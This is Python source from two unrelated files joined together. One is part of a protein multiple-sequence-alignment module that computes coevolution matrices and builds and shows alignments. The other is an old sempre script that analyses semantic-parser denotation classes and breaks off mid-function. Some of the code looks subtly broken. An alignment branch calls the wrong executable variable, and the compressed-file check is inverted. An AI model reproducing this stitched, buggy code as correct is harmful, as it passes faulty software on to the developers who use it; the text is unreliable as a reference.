(**O**, Pyl) are considered as distinct amino acids. When *ambiguity* is set **False**, all alphabet characters as considered as distinct types. All non-alphabet characters are considered as gaps.""" msa = getMSA(msa) from .msatools import msaomes LOGGER.timeit('_omes') length = msa.shape[1] omes = empty((length, length), float) omes = msaomes(msa, omes, ambiguity=bool(ambiguity), turbo=bool(turbo), debug=bool(kwargs.get('debug', False))) LOGGER.report('OMES matrix was calculated in %.2fs.', '_omes') return omes buildOMESMatrix.__doc__ += doc_turbo def buildSCAMatrix(msa, turbo=True, **kwargs): """Returns SCA matrix calculated for *msa*, which may be an :class:`.MSA` instance or a 2D Numpy character array. Implementation is case insensitive and handles ambiguous amino acids as follows: * **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn) * **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln) * **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu) * **X** (Xaa) count is allocated to the twenty standard amino acids * Joint probability of observing a pair of ambiguous amino acids is allocated to all potential combinations, e.g. probability of **XX** is allocated to 400 combinations of standard amino acids, similarly probability of **XB** is allocated to 40 combinations of *D* and *N* with the standard amino acids. Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered as distinct amino acids. When *ambiguity* is set **False**, all alphabet characters as considered as distinct types. All non-alphabet characters are considered as gaps.""" msa = getMSA(msa) if msa.shape[0]<100: LOGGER.warning('SCA performs the best with higher number of sequences, and ' 'minimal number of sequences is recommended as 100.') from .msatools import msasca LOGGER.timeit('_sca') length = msa.shape[1] sca = zeros((length, length), float) sca = msasca(msa, sca, turbo=bool(turbo)) LOGGER.report('SCA matrix was calculated in %.2fs.', '_sca') return sca buildSCAMatrix.__doc__ += doc_turbo def buildPCMatrix(msa, turbo=False, **kwargs): """Returns PC matrix calculated for *msa*, which may be an :class:`.MSA` instance or a 2D Numpy character array. Implementation is case insensitive and handles ambiguous amino acids as follows: * **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn) * **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln) * **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu) * **X** (Xaa) count is allocated to the twenty standard amino acids * Joint probability of observing a pair of ambiguous amino acids is allocated to all potential combinations, e.g. probability of **XX** is allocated to 400 combinations of standard amino acids, similarly probability of **XB** is allocated to 40 combinations of *D* and *N* with the standard amino acids. Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered as distinct amino acids. When *ambiguity* is set **False**, all alphabet characters as considered as distinct types. All non-alphabet characters are considered as gaps. """ msa = getMSA(msa) from .msatools import msapsicov LOGGER.timeit('_psicov') length = msa.shape[1] pc = zeros((length, length), float) pc = msapsicov(msa, pc, turbo=bool(turbo)) LOGGER.report('PC matrix was calculated in %.2fs.', '_psicov') return pc def buildDirectInfoMatrix(msa, seqid=.8, pseudo_weight=.5, refine=False, **kwargs): """Returns direct information matrix calculated for *msa*, which may be an :class:`.MSA` instance or a 2D Numpy character array. Sequences sharing sequence identity of *seqid* or more with another sequence are regarded as similar sequences for calculating their weights using :func:`.calcMeff`. *pseudo_weight* are the weight for pseudo count probability. Sequences are not refined by default. When *refine* is set **True**, the MSA will be refined by the first sequence and the shape of direct information matrix will be smaller. """ msa = getMSA(msa) from .msatools import msadipretest, msadirectinfo1, msadirectinfo2 from numpy import matrix LOGGER.timeit('_di') if msa.shape[0]<250: LOGGER.warning('DI performs the best with higher number of sequences, and ' 'minimal number of sequences is recommended as 250.') refine = 1 if refine else 0 # msadipretest get some parameter from msa to set matrix size length, q = msadipretest(msa, refine=refine) c = matrix.dot(matrix(zeros((length*q, 1), float)), matrix(zeros((1, length*q), float))) prob = zeros((length, q+1), float) # msadirectinfo1 return c to be inversed and prob to be used meff, n, length, c, prob = msadirectinfo1(msa, c, prob, theta=1.-seqid, pseudocount_weight=pseudo_weight, refine=refine, q=q+1) c = c.I di = zeros((length, length), float) # get final DI di = msadirectinfo2(n, length, c, prob, di, q+1) del prob, c LOGGER.report('DI matrix was calculated in %.2fs.', '_di') return di def calcMeff(msa, seqid=.8, refine=False, weight=False, **kwargs): """Returns the Meff for *msa*, which may be an :class:`.MSA` instance or a 2D Numpy character array. Since similar sequences in an *msa* decreases the diversity of *msa*, *Meff* gives a weight for sequences in the *msa*. For example: One sequence in MSA has 5 other similar sequences in this MSA(itself included). The weight of this sequence is defined as 1/5=0.2. Meff is the sum of all sequence weights. In another word, Meff can be understood as the effective number of independent sequences. Sequences sharing sequence identity of *seqid* or more with another sequence are regarded as similar sequences to calculate Meff. Sequences are not refined by default. When *refine* is set **True**, the MSA will be refined by the first sequence. The weight for each sequence are returned when *weight* is **True**.""" msa = getMSA(msa) from .msatools import msameff LOGGER.timeit('_meff') refine = 1 if refine else 0 weight = 0 if weight else 1 # A Mark for return weighted array. if (not weight): w = zeros((msa.shape[0]), float) meff = msameff(msa, theta=1.-seqid, meff_only=weight, refine=refine, w=w) else: meff = msameff(msa, theta=1.-seqid, meff_only=weight, refine=refine) LOGGER.report('Meff was calculated in %.2fs.', '_meff') return meff def alignSequencesByChain(PDBs, **kwargs): """ Runs :func:`buildMSA` for each chain and optionally joins the results. Returns either a single :class:`MSA` or a dictionary containing an :class:`MSA` for each chain. :arg PDBs: a list of :class:`AtomGroup` objects :type PDBs: list :arg join_chains: whether to join chain alignments default is True :type join_chains: bool :arg join_char: a character for joining chain alignments default is '/' as used by PIR format alignments :type join_char: str """ if isscalar(PDBs): raise TypeError('PDBs should be array-like') if not PDBs: raise ValueError('PDBs should not be empty') pdbs = [] chains = [] for i, pdb in enumerate(PDBs): if isinstance(pdb, Atomic): pdbs.append(pdb) else: raise TypeError('each entry in PDBs must be a :class:`Atomic` instance') chains.append([]) for chain in list(pdbs[i].getHierView()): chains[i].append(chain) if i != 0 and len(chains[i]) != len(chains[0]): raise ValueError('all pdbs should have the same number of chains') labels = [] for pdb in pdbs: chids = '' for chain in list(pdb.getHierView()): chids += chain.getChid() labels.append(pdb.getTitle() + '_' + chids) chains = array(chains) chain_alignments = [] alignments = {} for j in range(len(chains[0])): prefix = 'chain_' + chains[0, j].getChid() msa = buildMSA(chains[:, j], title=prefix, labels=labels) msa = refineMSA(msa, colocc=1e-9) # remove gap-only cols chain_alignments.append(msa) alignments[labels[0].split('_')[1][j]] = msa join_chains = kwargs.get('join_chains', True) join_char = kwargs.get('join_char', '/') if len(chains[0]) == 1: join_chains = False if join_chains: joined_msaarr = [] for i, chain_alignment in enumerate(chain_alignments): pdb_seqs = [] for j, sequence in enumerate(chain_alignment): pdb_seqs.append(sequence) joined_msaarr.append(join_char.join(pdb_seqs)) result = MSA(joined_msaarr, title='joined_chains', labels=[label.split('_')[0] for label in labels]) else: result = alignments if len(result) == 1: result = result[list(result.keys())[0]] return result def buildMSA(sequences, title='Unknown', labels=None, **kwargs): """ Aligns sequences with clustalw or clustalw2 and returns the resulting MSA. :arg sequences: a file, MSA object or a list or array containing sequences as Atomic objects with :func:`getSequence` or Sequence objects or strings. If strings are used then labels must be provided using ``labels`` :type sequences: :class:`Atomic`, :class:`.MSA`, :class:`~numpy.ndarray`, str :arg title: the title for the MSA and it will be used as the prefix for output files. :type title: str :arg labels: a list of labels to go with the sequences :type labels: list :arg align: whether to align the sequences default True :type align: bool :arg method: alignment method, one of either 'global' (biopython.pairwise2.align.globalms), 'local' (biopython.pairwise2.align.localms), clustalw(2), or another software in your path. Default is 'clustalw' :type align: str """ align = kwargs.get('align', True) method = kwargs.pop('method', 'clustalw') # 1. check if sequences are in a fasta file and if not make one if isinstance(sequences, str): filename = sequences elif not isinstance(sequences, MSA): try: max_len = 0 for sequence in sequences: if isinstance(sequence, Atomic): if len(sequence.ca.copy()) > max_len: max_len = len(sequence.ca.copy()) elif isinstance(sequence, MSA): if len(sequence[0]) > max_len: max_len = len(sequence[0]) else: if len(sequence) > max_len: max_len = len(sequence) msa = [] fetched_labels = [] for i, sequence in enumerate(sequences): if isinstance(sequence, Atomic): strseq = sequence.ca.getSequence() label = sequence.getTitle() elif isinstance(sequence, Sequence): strseq = str(sequence) label = sequence.getLabel() elif isinstance(sequence, MSA): strseq = str(sequence[0]) label = sequence.getLabel(0) LOGGER.warn('Only the first sequence in the MSA at entry {0} is used.' .format(i)) elif isinstance(sequence, str): strseq = sequence label = str(i + 1) else: raise TypeError('sequences should be a list of strings, ' 'Atomic, or Sequence instances') strseq = strseq + '-'*(max_len - len(strseq)) msa.append(array(list(strseq))) fetched_labels.append(label) sequences = array(msa) except: raise TypeError('sequences should be iterable') # "if a list" is a pythonic way to check if a list is empty or not (or none) if not labels and fetched_labels: labels = fetched_labels label = [label.replace(' ','_') for label in labels] # labels checkers are removed because they will be properly handled in MSA class initialization msa = MSA(msa=sequences, title=title, labels=labels) if align and 'clustal' in method: filename = writeMSA(title + '.fasta', msa) if align: # 2. find and run alignment method if method in ['biopython', 'local', 'global']: if len(sequences) == 2: msa, _, _ = alignTwoSequencesWithBiopython(sequences[0], sequences[1], **kwargs) else: raise ValueError("Provide only two sequences or another method. \ Biopython pairwise alignment can only be used \ to build an MSA with two sequences.") elif 'clustalw' in method: clustalw = which('clustalw') if clustalw is None: if which('clustalw2') is not None: clustalw = which('clustalw2') else: raise EnvironmentError("The executable for clustalw was not found, \ install clustalw or add it to the path.") os.system('"%s" %s -OUTORDER=INPUT'%(clustalw, filename)) # 3. parse and return the new MSA msa = parseMSA(title + '.aln') else: alignTool = which(method) if alignTool is None: raise EnvironmentError("The executable for {0} was not found, \ install it or add it to the path.".format(alignTool)) os.system('"%s" %s -OUTORDER=INPUT'%(clustalw, filename)) # 3. parse and return the new MSA msa = parseMSA(title + '.aln') return msa def showAlignment(alignment, **kwargs): """ Prints out an alignment as sets of short rows with labels. :arg alignment: any object with aligned sequences :type alignment: :class: `.MSA`, list :arg row_size: the size of each row default 60 :type row_size: int :arg indices: a set of indices for some or all sequences that will be shown above the relevant sequences :type indices: :class:`~numpy.ndarray`, list :arg index_start: how far along the alignment to start putting indices default 0 :type index_start: int :arg index_stop: how far along the alignment to stop putting indices default the point when the shortest sequence stops :type index_stop: int :arg labels: a list of labels :type labels: list """ row_size = kwargs.get('row_size', 60) labels = kwargs.get('labels', None) if labels is not None: if isscalar(labels): raise TypeError('labels should be array-like') for label in labels: if not isinstance(label, str): raise TypeError('each label should be a string') if len(labels) < len(alignment): raise ValueError('there should be a label for every sequence shown') else: labels = [] for i, sequence in enumerate(alignment): if hasattr(sequence, 'getLabel'): labels.append(sequence.getLabel()) else: labels.append(str(i+1)) indices = kwargs.get('indices', None) index_start = kwargs.get('index_start', 0) index_stop = kwargs.get('index_stop', 0) if index_stop == 0 and indices is not None: locs = [] maxes = [] for index in indices: int_index = [] for i in index: if i == '': int_index.append(0) else: int_index.append(int(i)) int_index = array(int_index) maxes.append(max(int_index)) locs.append(where(int_index == max(int_index))[0][0]) index_stop = locs[where(maxes == min(maxes))[0][0]] for i in range(int(ceil(len(alignment[0])/float(row_size)))): for j in range(len(alignment)): if indices is not None: sys.stdout.write('\n' + ' '*15 + '\t') for k in range(row_size*i+10,row_size*(i+1)+10,10): try: if k > index_start + 10 and k < index_stop + 10: sys.stdout.write('{:10d}'.format(int(indices[j][k-1]))) elif k < index_stop: sys.stdout.write(' '*(k-index_start)) else: sys.stdout.write(' '*10) except: sys.stdout.write(' '*10) sys.stdout.write('\n') sys.stdout.write(labels[j][:15] + \ ' ' * (15-len(labels[j][:15])) + \ '\t' + str(alignment[j])[60*i:60*(i+1)] + '\n') sys.stdout.write('\n') return def alignSequenceToMSA(seq, msa, **kwargs): """ Align a sequence from a PDB or Sequence to a sequence from an MSA and create two sets of indices. The sequence from the MSA (*seq*), the alignment and the two sets of indices are returned. The first set (*indices*) maps the residue numbers in the PDB to the reference sequence. The second set (*msa_indices*) indexes the reference sequence in the msa and is used for retrieving values from the first indices. :arg seq: an object with an associated sequence string or a sequence string itself :type seq: :class:`.Atomic`, :class:`.Sequence`, str :arg msa: a multiple sequence alignment :type msa: :class:`.MSA` :arg label: a label for a sequence in msa or a PDB ID ``msa.getIndex(label)`` must return a sequence index :type label: str :arg chain: which chain from pdb to use for alignment, default is **None**, which does no selection on *seq*. This value will be ignored if seq is not an :class:`.Atomic` object. :type chain: str Parameters for Biopython ``pairwise2`` alignments can be provided as keyword arguments. Default values are originally from ``proteins.compare`` module, but now found in ``utilities.seqtools``. :arg match: a positive integer, used to reward finding a match :type match: int :arg mismatch: a negative integer, used to penalise finding a mismatch :type mismatch: int :arg gap_opening: a negative integer, used to penalise opening a gap :type gap_opening: int :arg gap_extension: a negative integer, used to penalise extending a gap :type gap_extension: int :arg method: method for pairwise2 alignment. Possible values are ``"local"`` and ``"global"`` :type method: str """ label = kwargs.get('label', None) chain = kwargs.get('chain', None) match = kwargs.get('match', MATCH_SCORE) mismatch = kwargs.get('mismatch', MISMATCH_SCORE) gap_opening = kwargs.get('gap_opening', GAP_PENALTY) gap_extension = kwargs.get('gap_extension', GAP_EXT_PENALTY) method = kwargs.get('method', ALIGNMENT_METHOD) if isinstance(seq, Atomic): if isinstance(chain, str): ag = seq.select('chain {0}'.format(chain)) elif chain is None: ag = seq chids = ag.getChids() if len(unique(chids)) > 1: LOGGER.warn('%s consists of multiple chains. Please consider selecting one chain'%(seq.getTitle())) else: raise TypeError('chain should be a string or None') if ag is None: raise ValueError('seq may be None or chain ID may be invalid') sequence = ag.select('ca').getSequence() elif isinstance(seq, Sequence): sequence = str(seq) ag = None elif isinstance(seq, str): sequence = seq ag = None else: raise TypeError('seq must be an atomic class, sequence class, or str not {0}' .format(type(seq))) if not isinstance(msa, MSA): raise TypeError('msa must be an MSA instance') if label is None: if ag: label = ag.getTitle().split('_')[0] elif isinstance(seq, Sequence): label = seq.getLabel() else: raise ValueError('A label cannot be extracted from seq so please provide one.') index = msa.getIndex(label) if index is None and (len(label) == 4 or len(label) == 5): from prody import parsePDB try: structure, header = parsePDB(label[:4], header=True) except Exception as err: raise IOError('failed to parse header for {0} ({1})' .format(label[:4], str(err))) chid = chain for poly in header['polymers']: if chid and poly.chid != chid: continue for dbref in poly.dbrefs: if index is None: index = msa.getIndex(dbref.idcode) if index is not None: LOGGER.info('{0} idcode {1} for {2}{3} ' 'is found in {4}.'.format( dbref.database, dbref.idcode, label[:4], poly.chid, str(msa))) label = dbref.idcode break if index is None: index = msa.getIndex(dbref.accession) if index is not None: LOGGER.info('{0} accession {1} for {2}{3} ' 'is found in {4}.'.format( dbref.database, dbref.accession, label[:4], poly.chid, str(msa))) label = dbref.accession break if index is not None: chain = structure[poly.chid] if index is None: raise ValueError('label is not in msa, or msa is not indexed') try: len(index) except TypeError: pass else: raise ValueError('label {0} maps onto multiple sequences, ' 'so cannot be used for refinement'.format(label)) if isinstance(index, int): refMsaSeq = str(msa[index]).upper().replace('-','.') else: raise TypeError('The output from querying that label against msa is not a single sequence.') if method == 'local': alignment = pairwise2.align.localms(sequence, str(refMsaSeq), match, mismatch, gap_opening, gap_extension, one_alignment_only=1) elif method == 'global': alignment = pairwise2.align.globalms(sequence, str(refMsaSeq), match, mismatch, gap_opening, gap_extension, one_alignment_only=1) else: raise ValueError('method should be local or global') seq_indices = [0] msa_indices = [0] for i in range(len(alignment[0][0])): if alignment[0][0][i] != '-': seq_indices.append(seq_indices[i]+1) else: seq_indices.append(seq_indices[i]) if alignment[0][1][i] != '-': msa_indices.append(msa_indices[i]+1) else: msa_indices.append(msa_indices[i]) seq_indices.pop(0) # The first element was extra for initialisation msa_indices.pop(0) # The first element was extra for initialisation seq_indices = array(seq_indices) msa_indices = array(msa_indices) if ag: seq_indices += ag.getResnums()[0] - 1 alignment = MSA(msa=array([array(list(alignment[0][0])), \ array(list(alignment[0][1]))]), \ labels=[ag.getTitle(), label]) return alignment, seq_indices, msa_indices def alignTwoSequencesWithBiopython(seq1, seq2, **kwargs): """Easily align two sequences with Biopython's globalms or localms. Returns an MSA and indices for use with :func:`.showAlignment`. Alignment parameters can be provided as keyword arguments. Default values are as originally set in the proteins.compare module, but now found in utilities.seqtools. :arg match: a positive integer, used to reward finding a match :type match: int :arg mismatch: a negative integer, used to penalise finding a mismatch :type mismatch: int :arg gap_opening: a negative integer, used to penalise opening a gap :type gap_opening: int :arg gap_extension: a negative integer, used to penalise extending a gap :type gap_extension: int :arg method: method for pairwise2 alignment. Possible values are 'local' and 'global' :type method: str """ match = kwargs.get('match', MATCH_SCORE) mismatch = kwargs.get('mismatch', MISMATCH_SCORE) gap_opening = kwargs.get('gap_opening', GAP_PENALTY) gap_extension = kwargs.get('gap_extension', GAP_EXT_PENALTY) method = kwargs.get('method', ALIGNMENT_METHOD) if method == 'local': alignment = pairwise2.align.localms(seq1, seq2, match, mismatch, gap_opening, gap_extension) elif method == 'global': alignment = pairwise2.align.globalms(seq1, seq2, match, mismatch, gap_opening, gap_extension) else: raise ValueError('method should be local or global') seq_indices = [0] msa_indices = [0] for i in range(len(alignment[0][0])): if alignment[0][0][i] != '-': seq_indices.append(seq_indices[i]+1) else: seq_indices.append(seq_indices[i]) if alignment[0][1][i] != '-': msa_indices.append(msa_indices[i]+1) else: msa_indices.append(msa_indices[i]) seq_indices = array(seq_indices) msa_indices = array(msa_indices) alignment = MSA(msa=array([array(list(alignment[0][0])), \ array(list(alignment[0][1]))])) return alignment, seq_indices, msa_indices def trimAtomsUsingMSA(atoms, msa, **kwargs): """This function uses :func:`.alignSequenceToMSA` and has the same kwargs. :arg atoms: an atomic structure for trimming :type atoms: :class:`.Atomic` :arg msa: a multiple sequence alignment :type msa: :class:`.MSA` """ aln, idx_1, idx_2 = alignSequenceToMSA(atoms, msa, **kwargs) u, i = unique(idx_2, return_index=True) resnums_str = ' '.join([str(x) for x in idx_1[i]]) chain = kwargs.get('chain', 'A') return atoms.select('chain {0} and resnum {1}'.format(chain, resnums_str))
tables/table-alter/old-fictitious-experiments.py
yash-srivastava19/sempre
812
12686774
<reponame>yash-srivastava19/sempre<filename>tables/table-alter/old-fictitious-experiments.py #!/usr/bin/env python # -*- coding: utf-8 -*- """DEPRECATED. Use fictitious-experiments.py instead.""" import sys, os, shutil, re, argparse, json, gzip from codecs import open from itertools import izip from collections import defaultdict, Counter def clean(x): # Remove actual string from names x = x.decode('utf8').replace(ur'\"', '') x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*)\)', r'(name \1)', x) x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*) [^")]*\)', r'(name \1)', x) x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*) "[^"]*"\)', r'(name \1)', x) return x def read_denotation_file(ex_id, fin): """Return n, k, d, denotations, grid""" n, k, d = [int(x) for x in fin.readline().split()] denotations = [] for i in xrange(d): denotations.append(clean(fin.readline()[:-1])) if not denotations: print >> sys.stderr, 'Warning: no denotations - ', ex_id elif denotations[0] == '(list)': print >> sys.stderr, 'Warning: denotations[0] == (list) - ', ex_id denotations.append(None) grid = [] for i in xrange(n): row = [denotations[int(x)] for x in fin.readline()[:-1].split()] grid.append(row) denotations.pop() return n, k, d, denotations, grid ################################################ # Count number of equivalence classes def process1(ex_id, fin): n, k, d, denotations, grid = read_denotation_file(ex_id, fin) equiv_classes = {0: set(), 5: set(), 10: set(), 30: set(), 100: set(), 300: set()} for row in grid: row = tuple(row) for num_tables, value in equiv_classes.items(): value.add(row[:num_tables+1]) fields = [ex_id, n, k, d] for key, value in sorted(equiv_classes.items()): fields.append(len(value)) print '\t'.join(str(x) for x in fields) sys.stdout.flush() # Find out how many are split from main class when going from 30 --> 300 def process2(ex_id, fin): n, k, d, denotations, grid = read_denotation_file(ex_id, fin) thirties = defaultdict(Counter) for row in grid: row = tuple(row) thirties[row[:31]][row[:301]] += 1 #thirties[row[:6]][row[:31]] += 1 cores = splits = 0 for key, value in thirties.items(): core = value.most_common(1)[0][1] cores += core splits += (sum(value.values()) - core) fields = [ex_id, n, k, d, len(thirties), cores, splits] print '\t'.join(str(x) for x in fields) sys.stdout.flush() # Find out the splitters from 30 --> 300 def process3(ex_id, fin): n, k, d, denotations, grid = read_denotation_file(ex_id, fin) thirties = defaultdict(lambda: defaultdict(list)) counts = Counter() for i, row in enumerate(grid): row = tuple(row) thirties[row[:31]][row].append(i) counts[row[:31]] += 1 cores = [] splits = [] if counts: first_thirty_one, count = counts.most_common(1)[0] full = thirties[first_thirty_one] # full = map from full denotation tuple to deriv indices core = max(len(x) for x in full.values()) for indices in full.values(): if len(indices) == core: cores.extend(indices) else: splits.extend(indices) if not splits: cores = [] else: splits = sorted(splits) fields = [ex_id, n, k, d, len(thirties), len(cores), len(splits), ' '.join(str(x) for x in cores[:30]), ' '.join(str(x) for x in splits[:30])] print '\t'.join(str(x) for x in fields) sys.stdout.flush() # Find out more stuff about annotation def process5(ex_id, fin, ann_fin, ret_data, size_path, formula_path): n, k, d, denotations, grid = read_denotation_file(ex_id, fin) grid = [row[:31] for row in grid] # Equiv class to list of indices equiv_classes = defaultdict(list) for i, row in enumerate(grid): equiv_classes[tuple(row)].append(i) # Read annotation annotations = [] for line in ann_fin: annotations.append(clean(line[:-1])) annotations = tuple(annotations[:31]) # Read size if size_path: with open(size_path) as fin: sizes = [int(x) for x in fin] else: sizes = [0] * n sizes_counter = Counter(sizes) # Read formulas if formula_path: with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin: formulas = fin.readlines() else: formulas = [''] * n score, chosen_entropy = ret_data chosen_random = range(len(chosen_entropy)) fields = [ex_id, n, k, d, len(equiv_classes), '{:.3}'.format(score), ' '.join(str(x) for x in chosen_entropy), ' '.join('{}:{}'.format(u, sizes_counter[u]) for u in xrange(1, 9))] if annotations[0] == 'null': fields.append('no') else: fields.append('yes') # Count the number of matches matched = len(equiv_classes[annotations]) fields.append(matched) # Chosen equiv classes based on chosen tables def count_on_chosen(chosen): chosen_annotations = tuple(annotations[x] for x in chosen) num_classes_matched = 0 num_derivs_matched = [] derivs_matched = [] for key, value in equiv_classes.items(): chosen_key = tuple(key[x] for x in chosen) if chosen_key == chosen_annotations: num_classes_matched += 1 num_derivs_matched.append(len(value)) derivs_matched.extend(value) fields.extend([num_classes_matched, sum(num_derivs_matched)]) fields.append(list(reversed(sorted(num_derivs_matched)))) derivs_matched.sort() matched_sizes = [sizes[x] for x in derivs_matched] matched_sizes_counter = Counter(matched_sizes) fields.append(' '.join('{}:{}'.format(u, matched_sizes_counter[u]) for u in xrange(1, 9))) # Is the formula with the lowest size the annotated one? if matched_sizes: min_size, min_index = min((u,i) for (u,i) in zip(matched_sizes, derivs_matched)) fields.append([min_size, min_index, formulas[min_index]]) else: fields.append('') count_on_chosen(chosen_entropy) count_on_chosen(chosen_random) print '\t'.join(str(x) for x in fields) sys.stdout.flush() # Find out stuff about annotation; turked version def process6(ex_id, fin, ann_fin, size_path, formula_path, exec_dir): # These are only for computing equivalence classes n, k, d, denotations, grid = read_denotation_file(ex_id, fin) grid = [row[:31] for row in grid] # Equiv class to list of indices equiv_classes = defaultdict(list) for i, row in enumerate(grid): equiv_classes[tuple(row)].append(i) deriv_to_rep = {} for equiv_class in equiv_classes.values(): rep = min(equiv_class) for x in equiv_class: deriv_to_rep[x] = rep # Read annotation annotations = [] for line in ann_fin: annotations.append(clean(line[:-1])) annotations = tuple(annotations[:31]) # Read size if size_path: with open(size_path) as fin: sizes = [int(x) for x in fin] else: sizes = [0] * n sizes_counter = Counter(sizes) # Read formulas if formula_path: with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin: formulas = fin.readlines() else: formulas = [''] * n fields = [ex_id, n, k, d, len(equiv_classes), ' '.join('{}:{}'.format(u, sizes_counter[u]) for u in xrange(1, 9))] correct_class = None if annotations[0] == 'null': fields.append('no') fields.append('') else: fields.append('yes') # Count the number of matches matched = len(equiv_classes[annotations]) fields.append(matched) if matched > 0: correct_class = min(equiv_classes[annotations]) fields.append(correct_class) def get_flag(x): if x == '(number 42)' or x == '(name Ao)': return 'G' elif x == '(number 13)' or x == '(name Ax)': return 'F' elif x == '(number 666)': return 'B' elif x == '(number 777)' or x == '(name Bo)': return 'g' elif x == '(number 999)' or x == '(name Bx)': return 'f' elif x == '(number 88)' or x == '(name X)': return 'X' else: return None # Read Turk data if os.path.exists(os.path.join(exec_dir, 'denotations')): prefix = '' else: prefix = 'actual-' with gzip.open(os.path.join(exec_dir, prefix + 'denotations', 'nt-{}.gz'.format(ex_id))) as fin: _, _, _, _, turk_grid = read_denotation_file(ex_id, fin) with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin: _, _, _, _, check_grid = read_denotation_file(ex_id, fin) check_grid = [[get_flag(x) for x in y] for y in check_grid] with gzip.open(os.path.join(exec_dir, prefix + 'annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin: anno_grid = [x[:-1] for x in fin] with gzip.open(os.path.join(exec_dir, 'check-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin: check_anno_grid = [x[:-1] for x in fin] check_anno_grid = [get_flag(x) for x in check_anno_grid] # Used indices if check_grid: used_indices = [i for (i,x) in enumerate(check_grid[0]) if x is not None] flags = [check_grid[0][i] for i in used_indices] else: used_indices = [i for (i,x) in enumerate(anno_grid) if x is not None] flags = [check_anno_grid[i] for i in used_indices] fields.append(used_indices) fields.append(''.join([{'G': 'A', 'F': 'A', 'B': 'B', 'g': 'B', 'f': 'B', 'X': 'X', None: '?'}[x] for x in flags])) fields.append(check_anno_grid[0]) # Scheme is a function that takes in a check vector (only for used indices) # and return True (matched) or False (not matched). # # For each possible scheme, compute # - number of classes matched # - number of formulas matched # - class sizes # - whether the annotated formula matches turked data # - whether the "correct" class is among the matched classes def check_scheme(scheme): hello = [] for check_vector in check_grid: hello.append(scheme([check_vector[x] for x in used_indices])) hello_anno = scheme([check_anno_grid[x] for x in used_indices]) # num classes matched matched_derivs = [i for (i,x) in enumerate(hello) if x] matched_classes = set(deriv_to_rep[x] for x in matched_derivs) fields.append(len(matched_classes)) fields.append(len(matched_derivs)) class_sizes = [(len(equiv_classes[tuple(grid[x])]), x) for x in matched_classes] #class_sizes.sort(key=lambda x: -x[0]) #fields.append([x[1] for x in class_sizes]) #fields.append([x[0] for x in class_sizes]) # manually annotated formula fields.append(hello_anno) # correct is among? fields.append(correct_class in matched_classes) def no_big_f(vector): return all(x != 'F' for x in vector) check_scheme(no_big_f) def no_f_ever(vector): return all((x != 'f' and x != 'F') for x in vector) check_scheme(no_f_ever) def at_most_one_big_f(vector): return sum([x == 'F' for x in vector], 0) <= 1 check_scheme(at_most_one_big_f) print '\t'.join(str(x) for x in fields) sys.stdout.flush() # Dump equivalence classes to a file def process7(ex_id, fin, ann_fin, size_path, formula_path, exec_dir, outdir): n, k, d, denotations, grid = read_denotation_file(ex_id, fin) denotations_set = set(denotations) #grid = [row[:31] for row in grid] # Read annotation annotations = [] for line in ann_fin: annotations.append(clean(line[:-1])) for x in set(annotations): if x not in denotations_set and n > 0: print >> sys.stderr, 'WTF:', ex_id, n, k, d, x annotations = tuple(annotations) print annotations #annotations = annotations[:31] # Read size if size_path: with open(size_path) as fin: sizes = [int(x) for x in fin] else: sizes = [0] * n sizes_counter = Counter(sizes) # Read formulas if formula_path: with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin: formulas = [x.strip() for x in fin.readlines()] else: formulas = [''] * n fields = [ex_id, n, k, d] if annotations[0] == 'null': fields.append('no') else: fields.append('yes') def get_flag(x): if x == '(name Ao)': return 'G' elif x == '(name Ax)': return 'F' elif x == '(name Bo)': return 'g' elif x == '(name Bx)': return 'f' elif x == '(name X)': return 'X' else: assert x is None or x == 'null' return None # Read Turk data with gzip.open(os.path.join(exec_dir, 'actual-denotations', 'nt-{}.gz'.format(ex_id))) as fin: _, _, _, _, turk_grid = read_denotation_file(ex_id, fin) with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin: _, _, _, _, check_grid = read_denotation_file(ex_id, fin) check_grid = [[get_flag(x) for x in y] for y in check_grid] with gzip.open(os.path.join(exec_dir, 'actual-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin: anno_grid = [x[:-1] for x in fin] with gzip.open(os.path.join(exec_dir, 'check-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin: check_anno_grid = [x[:-1] for x in fin] check_anno_grid = [get_flag(x) for x in check_anno_grid] # Dump equivalence classes # Also dump whether the class # - Matches the annotated formula # - Matches the turked data deno_tuple_to_indices = defaultdict(list) for i, row in enumerate(grid): row = tuple(row) deno_tuple_to_indices[row].append(i) classes = [] flag_counts_classes = [0, 0, 0, 0] flag_counts_formulas = [0, 0, 0, 0] for deno_tuple, indices in deno_tuple_to_indices.iteritems(): real = all(x != 'F' for x in check_grid[indices[0]]) ideal = (deno_tuple == annotations) classes.append([real, ideal, indices]) flag_counts_classes[real * 2 + ideal] += 1 flag_counts_formulas[real * 2 + ideal] += len(indices) classes.sort(key=lambda x: (-x[0]-x[1], -x[0], -len(x[2]))) fields.append(len(classes)) fields.extend(flag_counts_classes) fields.extend(flag_counts_formulas) with open(os.path.join(outdir, 'nt-' + str(ex_id)), 'w') as fout: print >> fout, '{} classes ({} formulas) {{'.format(len(classes), n) for i, (real, ideal, indices) in enumerate(classes): equiv_class = [(sizes[i], formulas[i]) for i in indices] equiv_class.sort(key=lambda x: x[1]) print >> fout, ' CLASS {} ({} formulas){}{} {{'.format( i, len(equiv_class), '[IDEAL]' if ideal else '', '[TURK]' if real else '') for s, f in equiv_class: print >> fout, ' ', s, f print >> fout, ' }' print >> fout, '}' print '\t'.join(str(x) for x in fields) sys.stdout.flush() # Dump matching formulas to a file def process8(ex_id, fin, formula_path, exec_dir, outdir): # Actually fin is not needed ... n, k, d = 